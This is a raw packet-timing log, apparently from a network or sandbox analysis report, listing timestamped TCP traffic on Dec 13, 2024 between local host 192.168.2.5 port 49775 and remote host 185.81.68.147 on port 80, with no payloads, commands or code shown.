                                                                                                                                                                Dec 13, 2024 01:37:35.888175011 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888200998 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888214111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888236046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888248920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888274908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888300896 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888324976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888338089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888354063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888371944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888400078 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888422012 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888443947 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888463974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888485909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888513088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888530016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888550043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888571978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888586998 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888612986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888725042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888742924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888766050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888780117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888809919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888832092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888858080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888873100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888897896 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888923883 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888950109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888968945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888992071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889007092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889035940 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889055967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889074087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889089108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889112949 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889141083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889163971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889179945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889205933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889219999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889295101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889329910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889343977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889365911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889379978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889411926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889426947 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889481068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889516115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889539957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889574051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889592886 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889616013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889630079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889662981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889725924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889754057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889767885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889791965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889806032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889834881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889853954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889877081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889892101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889918089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.889941931 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.890002966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.890029907 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.890043974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.901534081 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.901693106 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.901738882 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.901753902 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902086973 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902123928 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902148962 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902159929 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902267933 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902276993 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902286053 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902295113 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902302980 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902311087 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902319908 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902328968 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902337074 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902740955 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902761936 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902770042 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902776957 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902785063 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902792931 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902820110 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902832985 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902842045 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902863026 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902899027 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902945042 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.902992964 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.903002977 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.903009892 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.903044939 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.903057098 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.903064013 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.903083086 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.903090954 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.903177023 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.903186083 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.903192997 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.903203011 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.913530111 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.913670063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.913698912 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.913729906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.913755894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.913755894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.913755894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.913773060 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.913789988 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.913794041 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.913805962 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.913824081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.913827896 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.913836956 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.913842916 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.913867950 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.913882971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.913901091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.913932085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.913950920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.913968086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.913970947 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.913980007 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.913986921 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.913988113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.914004087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.914019108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.914036989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.914056063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.914067030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.914088964 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.914103031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.914141893 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914150953 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914170027 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914177895 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914304018 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914330006 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914359093 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914366961 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914437056 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914458036 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914473057 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914606094 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914649010 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914657116 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914735079 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914849043 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914858103 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914865017 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914890051 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914900064 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914916992 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.914931059 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.915010929 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.928869963 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.928958893 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929007053 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929076910 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929088116 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929099083 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929197073 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929209948 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929218054 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929236889 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929378033 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929385900 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929406881 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929415941 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929421902 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929534912 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929596901 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929606915 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929641008 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929651976 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929660082 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929671049 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929805994 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929815054 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929847002 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929855108 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929869890 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929909945 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.929919004 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.930073977 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.930083990 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.930095911 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.930113077 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.930120945 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.932188034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932228088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932244062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932272911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932290077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932312965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932400942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932400942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932400942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932400942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932420969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932446003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932466030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932486057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932508945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932543993 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932559013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932578087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932595015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932636023 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932650089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932677984 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932693005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932718992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932734013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932759047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932774067 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.932801008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.936862946 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.936913967 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.936925888 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.936933041 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.936953068 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937108040 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937155008 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937164068 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937196970 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937205076 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937280893 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937505960 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937521935 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937546015 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937555075 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937561989 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937576056 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937596083 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937603951 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937612057 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937779903 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937788010 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937797070 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937817097 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937902927 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.937923908 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938179016 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938199043 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938215971 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938338995 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938401937 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938410044 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938422918 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938438892 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938496113 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938535929 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938649893 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938673973 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938692093 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938705921 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938714027 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938745975 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938858986 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938905954 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938919067 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938927889 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.938993931 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.939109087 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.939146996 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.939215899 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.939227104 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.939234972 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.939459085 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.939469099 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.939505100 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.939512968 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.939578056 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.939703941 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.939786911 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.939930916 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.939939976 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.939946890 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.939954996 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940057039 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940069914 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940078020 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.940100908 CET8049775185.81.68.147192.168.2.5
